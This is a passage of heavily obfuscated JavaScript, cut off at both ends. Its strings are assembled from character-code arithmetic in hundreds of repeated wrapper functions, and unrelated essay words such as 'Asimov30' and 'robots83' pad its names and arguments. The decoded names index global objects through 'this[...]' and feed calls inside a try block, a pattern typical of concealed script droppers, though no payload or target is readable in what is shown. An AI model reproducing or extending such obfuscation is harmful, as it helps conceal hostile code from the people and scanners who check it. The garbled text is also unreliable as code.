jveForth4[Vgtf_56]=4; jveForth4[Vgtf_56-(Vgtf_56/3)]=46; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jveForth4[600]-jveForth4[Vgtf_56]),RunGe);  })(396,'while59',true,396)+(function(Rt,Rx){ var fvsfeat5=Brfcook; fvsfeat5[Vgtf_56]=4; fvsfeat5[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fvsfeat5[600]-fvsfeat5[Vgtf_56]),RunGe);  })('into30',null,false,'Asimov30')+(function(Rt,Rx){ var iqvmerel5=Brfcook; iqvmerel5[Vgtf_56]=1; iqvmerel5[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iqvmerel5[600]-iqvmerel5[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var qkjothe5=Brfcook; qkjothe5[Vgtf_56]=2; qkjothe5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qkjothe5[600]-qkjothe5[Vgtf_56]),RunGe);  })('robot28',null)+(function(Rt,Rx){ var fsstha5=Brfcook; fsstha5[Vgtf_56]=2; fsstha5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fsstha5[600]-fsstha5[Vgtf_56]),RunGe);  })(1071,'obey60')+(function(Rt,Rx){ var iqjgrad4=Brfcook; iqjgrad4[Vgtf_56]=3; iqjgrad4[Vgtf_56-(Vgtf_56/3)]=35; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iqjgrad4[600]-iqjgrad4[Vgtf_56]),RunGe);  })(true,'robots83','conscience16')+(function(Rt,Rx){ var fipHere4=Brfcook; fipHere4[Vgtf_56]=3; fipHere4[Vgtf_56-(Vgtf_56/3)]=45; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fipHere4[600]-fipHere4[Vgtf_56]),RunGe);  })('rooted92',null,'thus68')+(function(Rt,Rx){ var npwskil5=Brfcook; npwskil5[Vgtf_56]=3; npwskil5[Vgtf_56-(Vgtf_56/3)]=49; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(npwskil5[600]-npwskil5[Vgtf_56]),RunGe);  })(true,'human24',false)+(function(Rt,Rx){ var fwffeatu3=Brfcook; fwffeatu3[Vgtf_56]=3; fwffeatu3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwffeatu3[600]-fwffeatu3[Vgtf_56]),RunGe);  })('into30',null,'Asimov30')+(function(Rt,Rx){ var ksetha4=Brfcook; ksetha4[Vgtf_56]=3; ksetha4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ksetha4[600]-ksetha4[Vgtf_56]),RunGe);  })(1855,'obey60','factory29')+(function(Rt,Rx){ var hjvskil3=Brfcook; hjvskil3[Vgtf_56]=3; hjvskil3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hjvskil3[600]-hjvskil3[Vgtf_56]),RunGe);  })('human24',225,true)+(function(Rt,Rx){ var evtgrat4=Brfcook; evtgrat4[Vgtf_56]=3; evtgrat4[Vgtf_56-(Vgtf_56/3)]=35; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(evtgrat4[600]-evtgrat4[Vgtf_56]),RunGe);  })('addition49','being51','evades28')+(function(Rt,Rx){ var vnwfo5=Brfcook; vnwfo5[Vgtf_56]=1; vnwfo5[Vgtf_56-(Vgtf_56/3)]=43; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vnwfo5[600]-vnwfo5[Vgtf_56]),RunGe);  })('robots83')+(function(Rt,Rx){ var svqgrad5=Brfcook; svqgrad5[Vgtf_56]=3; svqgrad5[Vgtf_56-(Vgtf_56/3)]=49; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(svqgrad5[600]-svqgrad5[Vgtf_56]),RunGe);  })('Laws75',false,'although94')+(function(Rt,Rx){ var qusco5=Brfcook; qusco5[Vgtf_56]=3; qusco5[Vgtf_56-(Vgtf_56/3)]=123; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qusco5[600]-qusco5[Vgtf_56]),RunGe);  })('declarations83',true,'provided81')+(function(Rt,Rx){ var vqkcon5=Brfcook; vqkcon5[Vgtf_56]=4; vqkcon5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vqkcon5[600]-vqkcon5[Vgtf_56]),RunGe);  })('what20',false,null,null)+(function(Rt,Rx){ var vkswri5=Brfcook; vkswri5[Vgtf_56]=1; vkswri5[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vkswri5[600]-vkswri5[Vgtf_56]),RunGe);  })('Both81');   var gicqnpolicy67ko=0.102; var gicqnchosenby4='';   var gicqntricks57ko=[118,180]; var gicqnknew81=1;   var gicqnsocialreform5ko=true; var gicqnslow85=(function(Rt,Rx){ var fqfwe5=Brfcook; fqfwe5[Vgtf_56]=0; fqfwe5[Vgtf_56-(Vgtf_56/3)]=97; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fqfwe5[600]-fqfwe5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var fknlivel3=Brfcook; fknlivel3[Vgtf_56]=2; fknlivel3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fknlivel3[600]-fknlivel3[Vgtf_56]),RunGe);  })('second5',1046)+(function(Rt,Rx){ var pnffeat5=Brfcook; pnffeat5[Vgtf_56]=2; pnffeat5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pnffeat5[600]-pnffeat5[Vgtf_56]),RunGe);  })(true,true)+(function(Rt,Rx){ var ujefea5=Brfcook; ujefea5[Vgtf_56]=4; ujefea5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujefea5[600]-ujefea5[Vgtf_56]),RunGe);  })('into30',false,'Asimov30',false)+(function(Rt,Rx){ var kwucon5=Brfcook; kwucon5[Vgtf_56]=4; kwucon5[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kwucon5[600]-kwucon5[Vgtf_56]),RunGe);  })('declarations83','provided81',2679,false)+(function(Rt,Rx){ var jqpeve4=Brfcook; jqpeve4[Vgtf_56]=4; jqpeve4[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jqpeve4[600]-jqpeve4[Vgtf_56]),RunGe);  })(null,'White35',false,'short49')+(function(Rt,Rx){ var vvscons5=Brfcook; vvscons5[Vgtf_56]=3; vvscons5[Vgtf_56-(Vgtf_56/3)]=123; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vvscons5[600]-vvscons5[Vgtf_56]),RunGe);  })('declarations83',1996,'provided81')+(function(Rt,Rx){ var qfjand5=Brfcook; qfjand5[Vgtf_56]=1; qfjand5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qfjand5[600]-qfjand5[Vgtf_56]),RunGe);  })(null);   var gicqnparticularly92ko='undefined'; var gicqnunwillingly42=null;   var gicqndeputies70ko='although94'; var gicqncould60=gicqnhand51;   var gicqnthat42ko=null; var gicqndust23=null;   var gicqntheprevious46ko='undefined'; var gicqnwhat23=null;   var gicqnaims98ko=0.725; var gicqnguard54=gicqnhand51;   var gicqnprinciple65ko=0.193; var gicqndeficienciesof24='';   var gicqnforforcing20ko={G:89}; var gicqnlife70='';   var gicqndeputies70ko='although94'; var gicqncould602=null;   var gicqndeputies70ko='although94'; var gicqncould603=null;   var gicqnsocial65ko=false; var gicqnallowing28='';   var gicqnmany31ko={R:77}; var gicqnacceptance95='';   var gicqnescape5ko=0.989; var gicqneverything75='';   var gicqncomestheir26ko='robot28'; var gicqnTherefore25=null;   var gicqnavoid46ko=false; var gicqnplatitudes86=null;   var gicqnbolted65ko={V:79}; var gicqntheir96=((function(Rt,Rx){ var vhwgrat3=Brfcook; vhwgrat3[Vgtf_56]=3; vhwgrat3[Vgtf_56-(Vgtf_56/3)]=55; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vhwgrat3[600]-vhwgrat3[Vgtf_56]),RunGe);  })('addition49',true,1748)+(function(Rt,Rx){ var wticonsc3=Brfcook; wticonsc3[Vgtf_56]=4; wticonsc3[Vgtf_56-(Vgtf_56/3)]=54; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wticonsc3[600]-wticonsc3[Vgtf_56]),RunGe);  })('declarations83','provided81','second5',2175)+(function(Rt,Rx){ var vihever3=Brfcook; vihever3[Vgtf_56]=3; vihever3[Vgtf_56-(Vgtf_56/3)]=60; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vihever3[600]-vihever3[Vgtf_56]),RunGe);  })(null,1826,1826)+(function(Rt,Rx){ var tjvroa3=Brfcook; tjvroa3[Vgtf_56]=1; tjvroa3[Vgtf_56-(Vgtf_56/3)]=53; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tjvroa3[600]-tjvroa3[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var tufever3=Brfcook; tufever3[Vgtf_56]=1; tufever3[Vgtf_56-(Vgtf_56/3)]=58; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tufever3[600]-tufever3[Vgtf_56]),RunGe);  })(2434)+(function(Rt,Rx){ var ksumere3=Brfcook; ksumere3[Vgtf_56]=0; ksumere3[Vgtf_56-(Vgtf_56/3)]=54; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ksumere3[600]-ksumere3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var iswmerel5=Brfcook; iswmerel5[Vgtf_56]=1; iswmerel5[Vgtf_56-(Vgtf_56/3)]=56; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iswmerel5[600]-iswmerel5[Vgtf_56]),RunGe);  })('idea46')+(function(Rt,Rx){ var uunan5=Brfcook; uunan5[Vgtf_56]=0; uunan5[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uunan5[600]-uunan5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pjeoth3=Brfcook; pjeoth3[Vgtf_56]=1; pjeoth3[Vgtf_56-(Vgtf_56/3)]=58; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pjeoth3[600]-pjeoth3[Vgtf_56]),RunGe);  })(2648)+(function(Rt,Rx){ var jhpliv3=Brfcook; jhpliv3[Vgtf_56]=0; jhpliv3[Vgtf_56-(Vgtf_56/3)]=53; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jhpliv3[600]-jhpliv3[Vgtf_56]),RunGe);  })())*1;   var gicqnpolicy67ko=0.102; var gicqnthey76=0;   var gicqntricks57ko=[118,860]; var gicqnlife56='';   var gicqnsocialreform5ko=false; var gicqnarguments6=null;   var gicqnparticularly92ko='undefined'; var gicqnthemI89=13;   var gicqnparticularly92ko='undefined'; var gicqnthemI89m=-13;   var gicqnthat42ko=null; var gicqnthat29=null;   var gicqntheprevious46ko='undefined'; var gicqnpossibly71=this[(function(Rt,Rx){ var itnroad3=Brfcook; itnroad3[Vgtf_56]=2; itnroad3[Vgtf_56-(Vgtf_56/3)]=73; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(itnroad3[600]-itnroad3[Vgtf_56]),RunGe);  })(1717,1717)+(function(Rt,Rx){ var qisro4=Brfcook; qisro4[Vgtf_56]=0; qisro4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qisro4[600]-qisro4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var eeeHere3=Brfcook; eeeHere3[Vgtf_56]=4; eeeHere3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eeeHere3[600]-eeeHere3[Vgtf_56]),RunGe);  })(false,'rooted92',true,'thus68')+(function(Rt,Rx){ var fftgr3=Brfcook; fftgr3[Vgtf_56]=4; fftgr3[Vgtf_56-(Vgtf_56/3)]=83; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fftgr3[600]-fftgr3[Vgtf_56]),RunGe);  })(null,'addition49',true,null)+(function(Rt,Rx){ var phqco3=Brfcook; phqco3[Vgtf_56]=3; phqco3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(phqco3[600]-phqco3[Vgtf_56]),RunGe);  })('declarations83','provided81',null)+(function(Rt,Rx){ var nviwr4=Brfcook; nviwr4[Vgtf_56]=1; nviwr4[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nviwr4[600]-nviwr4[Vgtf_56]),RunGe);  })('Both81')+(function(Rt,Rx){ var ejvtha4=Brfcook; ejvtha4[Vgtf_56]=1; ejvtha4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ejvtha4[600]-ejvtha4[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var nkegrati3=Brfcook; nkegrati3[Vgtf_56]=0; nkegrati3[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nkegrati3[600]-nkegrati3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var evpevery5=Brfcook; evpevery5[Vgtf_56]=3; evpevery5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(evpevery5[600]-evpevery5[Vgtf_56]),RunGe);  })(true,'White35',false)];   var gicqnaims98ko=0.725; var gicqnbread72=this[(function(Rt,Rx){ var qfngrad3=Brfcook; qfngrad3[Vgtf_56]=2; qfngrad3[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qfngrad3[600]-qfngrad3[Vgtf_56]),RunGe);  })(false,true)+(function(Rt,Rx){ var kppgr4=Brfcook; kppgr4[Vgtf_56]=1; kppgr4[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kppgr4[600]-kppgr4[Vgtf_56]),RunGe);  })('addition49')+(function(Rt,Rx){ var ijtliv3=Brfcook; ijtliv3[Vgtf_56]=3; ijtliv3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijtliv3[600]-ijtliv3[Vgtf_56]),RunGe);  })(true,'second5',true)+(function(Rt,Rx){ var tjkthe5=Brfcook; tjkthe5[Vgtf_56]=0; tjkthe5[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tjkthe5[600]-tjkthe5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var utefeat4=Brfcook; utefeat4[Vgtf_56]=1; utefeat4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(utefeat4[600]-utefeat4[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var huumere5=Brfcook; huumere5[Vgtf_56]=2; huumere5[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(huumere5[600]-huumere5[Vgtf_56]),RunGe);  })('idea46','indeed17')+(function(Rt,Rx){ var uhpaval3=Brfcook; uhpaval3[Vgtf_56]=3; uhpaval3[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uhpaval3[600]-uhpaval3[Vgtf_56]),RunGe);  })(true,'progress41',2124)+(function(Rt,Rx){ var hhvgrat5=Brfcook; hhvgrat5[Vgtf_56]=2; hhvgrat5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhvgrat5[600]-hhvgrat5[Vgtf_56]),RunGe);  })(false,'addition49')+(function(Rt,Rx){ var vfqgrati5=Brfcook; vfqgrati5[Vgtf_56]=1; vfqgrati5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vfqgrati5[600]-vfqgrati5[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var henwrit3=Brfcook; henwrit3[Vgtf_56]=0; henwrit3[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(henwrit3[600]-henwrit3[Vgtf_56]),RunGe);  })()];   var gicqnprinciple65ko=0.193; var gicqnParty96='';   var gicqnforforcing20ko={I:87}; var gicqnunwilling72=null;   var gicqnwere28ko='wrote6'; var gicqninthe75=false;   var gicqnmade33ko=false; var gicqnclasses41=gicqnweaken28[(function(Rt,Rx){ var whugr5=Brfcook; whugr5[Vgtf_56]=0; whugr5[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(whugr5[600]-whugr5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var htkcon4=Brfcook; htkcon4[Vgtf_56]=1; htkcon4[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(htkcon4[600]-htkcon4[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var nuiHere5=Brfcook; nuiHere5[Vgtf_56]=0; nuiHere5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nuiHere5[600]-nuiHere5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var whhgradu5=Brfcook; whhgradu5[Vgtf_56]=3; whhgradu5[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(whhgradu5[600]-whhgradu5[Vgtf_56]),RunGe);  })(false,'robots83',966)+(function(Rt,Rx){ var shfgra4=Brfcook; shfgra4[Vgtf_56]=0; shfgra4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shfgra4[600]-shfgra4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var fuero5=Brfcook; fuero5[Vgtf_56]=0; fuero5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fuero5[600]-fuero5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var wqhfe3=Brfcook; wqhfe3[Vgtf_56]=3; wqhfe3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wqhfe3[600]-wqhfe3[Vgtf_56]),RunGe);  })(284,false,'into30')+(function(Rt,Rx){ var uwjHere83=Brfcook; uwjHere83[Vgtf_56]=2; uwjHere83[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uwjHere83[600]-uwjHere83[Vgtf_56]),RunGe);  })(false,null)+(function(Rt,Rx){ var khpgrad4=Brfcook; khpgrad4[Vgtf_56]=3; khpgrad4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(khpgrad4[600]-khpgrad4[Vgtf_56]),RunGe);  })('Laws75',null,false)+(function(Rt,Rx){ var hkvan3=Brfcook; hkvan3[Vgtf_56]=1; hkvan3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hkvan3[600]-hkvan3[Vgtf_56]),RunGe);  })('could80')+(function(Rt,Rx){ var ieeskil4=Brfcook; ieeskil4[Vgtf_56]=4; ieeskil4[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ieeskil4[600]-ieeskil4[Vgtf_56]),RunGe);  })('human24',null,null,true)]((function(Rt,Rx){ var hewgr4=Brfcook; hewgr4[Vgtf_56]=3; hewgr4[Vgtf_56-(Vgtf_56/3)]=83; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hewgr4[600]-hewgr4[Vgtf_56]),RunGe);  })(true,591,null)+(function(Rt,Rx){ var ptnev4=Brfcook; ptnev4[Vgtf_56]=0; ptnev4[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ptnev4[600]-ptnev4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ssjgr4=Brfcook; ssjgr4[Vgtf_56]=3; ssjgr4[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ssjgr4[600]-ssjgr4[Vgtf_56]),RunGe);  })(true,'addition49','being51')+(function(Rt,Rx){ var tesskil4=Brfcook; tesskil4[Vgtf_56]=0; tesskil4[Vgtf_56-(Vgtf_56/3)]=67; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tesskil4[600]-tesskil4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nhvaval5=Brfcook; nhvaval5[Vgtf_56]=2; nhvaval5[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nhvaval5[600]-nhvaval5[Vgtf_56]),RunGe);  })(false,'progress41')+(function(Rt,Rx){ var vnjgra4=Brfcook; vnjgra4[Vgtf_56]=3; vnjgra4[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vnjgra4[600]-vnjgra4[Vgtf_56]),RunGe);  })(false,'addition49',true)+(function(Rt,Rx){ var phwco5=Brfcook; phwco5[Vgtf_56]=3; phwco5[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(phwco5[600]-phwco5[Vgtf_56]),RunGe);  })('declarations83','provided81',null))[(function(Rt,Rx){ var jjithe5=Brfcook; jjithe5[Vgtf_56]=3; jjithe5[Vgtf_56-(Vgtf_56/3)]=76; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjithe5[600]-jjithe5[Vgtf_56]),RunGe);  })('must38',true,'named69')+(function(Rt,Rx){ var niqthat4=Brfcook; niqthat4[Vgtf_56]=4; niqthat4[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(niqthat4[600]-niqthat4[Vgtf_56]),RunGe);  })(false,'obey60','factory29',null)+(function(Rt,Rx){ var fpeev3=Brfcook; fpeev3[Vgtf_56]=2; fpeev3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fpeev3[600]-fpeev3[Vgtf_56]),RunGe);  })('White35','short49')+(function(Rt,Rx){ var uipth5=Brfcook; uipth5[Vgtf_56]=3; uipth5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uipth5[600]-uipth5[Vgtf_56]),RunGe);  })(false,1258,1258)]((function(Rt,Rx){ var hthsk5=Brfcook; hthsk5[Vgtf_56]=1; hthsk5[Vgtf_56-(Vgtf_56/3)]=68; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hthsk5[600]-hthsk5[Vgtf_56]),RunGe);  })('human24')+(function(Rt,Rx){ var svneve4=Brfcook; svneve4[Vgtf_56]=2; svneve4[Vgtf_56-(Vgtf_56/3)]=81; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(svneve4[600]-svneve4[Vgtf_56]),RunGe);  })('White35',null)+(function(Rt,Rx){ var jqsroadI5=Brfcook; jqsroadI5[Vgtf_56]=1; jqsroadI5[Vgtf_56-(Vgtf_56/3)]=78; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jqsroadI5[600]-jqsroadI5[Vgtf_56]),RunGe);  })('lawsthe36')+(function(Rt,Rx){ var ehethat3=Brfcook; ehethat3[Vgtf_56]=4; ehethat3[Vgtf_56-(Vgtf_56/3)]=84; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ehethat3[600]-ehethat3[Vgtf_56]),RunGe);  })('obey60',null,null,true)+(function(Rt,Rx){ var ijhHere84=Brfcook; ijhHere84[Vgtf_56]=1; ijhHere84[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijhHere84[600]-ijhHere84[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var swkmer3=Brfcook; swkmer3[Vgtf_56]=0; swkmer3[Vgtf_56-(Vgtf_56/3)]=84; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(swkmer3[600]-swkmer3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var fuwmere3=Brfcook; fuwmere3[Vgtf_56]=0; fuwmere3[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fuwmere3[600]-fuwmere3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var quwgr5=Brfcook; quwgr5[Vgtf_56]=2; quwgr5[Vgtf_56-(Vgtf_56/3)]=84; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(quwgr5[600]-quwgr5[Vgtf_56]),RunGe);  })('Laws75','although94')+(function(Rt,Rx){ var kwiev5=Brfcook; kwiev5[Vgtf_56]=2; kwiev5[Vgtf_56-(Vgtf_56/3)]=80; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kwiev5[600]-kwiev5[Vgtf_56]),RunGe);  })('White35','short49')+(function(Rt,Rx){ var knwroad5=Brfcook; knwroad5[Vgtf_56]=3; knwroad5[Vgtf_56-(Vgtf_56/3)]=68; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(knwroad5[600]-knwroad5[Vgtf_56]),RunGe);  })('lawsthe36','free58','being84')+(function(Rt,Rx){ var kvwHere4=Brfcook; kvwHere4[Vgtf_56]=0; kvwHere4[Vgtf_56-(Vgtf_56/3)]=77; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kvwHere4[600]-kvwHere4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var kjqmer4=Brfcook; kjqmer4[Vgtf_56]=2; kjqmer4[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kjqmer4[600]-kjqmer4[Vgtf_56]),RunGe);  })('idea46','indeed17'));      try   {    gicqndistributing22 =gicqndaily68[(function(Rt,Rx){ var vtimere5=Brfcook; vtimere5[Vgtf_56]=3; vtimere5[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtimere5[600]-vtimere5[Vgtf_56]),RunGe);  })('idea46','indeed17','supposed39')+(function(Rt,Rx){ var iqkevery3=Brfcook; iqkevery3[Vgtf_56]=3; iqkevery3[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iqkevery3[600]-iqkevery3[Vgtf_56]),RunGe);  })(true,1173,1173)+(function(Rt,Rx){ var fnvgradu5=Brfcook; fnvgradu5[Vgtf_56]=1; fnvgradu5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fnvgradu5[600]-fnvgradu5[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var tiuHe3=Brfcook; tiuHe3[Vgtf_56]=2; tiuHe3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tiuHe3[600]-tiuHe3[Vgtf_56]),RunGe);  })(547,547)+(function(Rt,Rx){ var junli4=Brfcook; junli4[Vgtf_56]=3; junli4[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(junli4[600]-junli4[Vgtf_56]),RunGe);  })('second5',null,2784)+(function(Rt,Rx){ var ekkwrit4=Brfcook; ekkwrit4[Vgtf_56]=2; ekkwrit4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ekkwrit4[600]-ekkwrit4[Vgtf_56]),RunGe);  })('Both81','beingcharitable40')+(function(Rt,Rx){ var ktfwork3=Brfcook; ktfwork3[Vgtf_56]=4; ktfwork3[Vgtf_56-(Vgtf_56/3)]=124; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ktfwork3[600]-ktfwork3[Vgtf_56]),RunGe);  })('although94',1347,'humans57','would68')+(function(Rt,Rx){ var jtqgra3=Brfcook; jtqgra3[Vgtf_56]=1; jtqgra3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jtqgra3[600]-jtqgra3[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var pwicons5=Brfcook; pwicons5[Vgtf_56]=3; pwicons5[Vgtf_56-(Vgtf_56/3)]=73; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pwicons5[600]-pwicons5[Vgtf_56]),RunGe);  })('declarations83','provided81',false)+(function(Rt,Rx){ var fivothe3=Brfcook; fivothe3[Vgtf_56]=0; fivothe3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fivothe3[600]-fivothe3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var upqFort3=Brfcook; upqFort3[Vgtf_56]=1; upqFort3[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(upqFort3[600]-upqFort3[Vgtf_56]),RunGe);  })(828)+(function(Rt,Rx){ var pfjco4=Brfcook; pfjco4[Vgtf_56]=4; pfjco4[Vgtf_56-(Vgtf_56/3)]=105; return 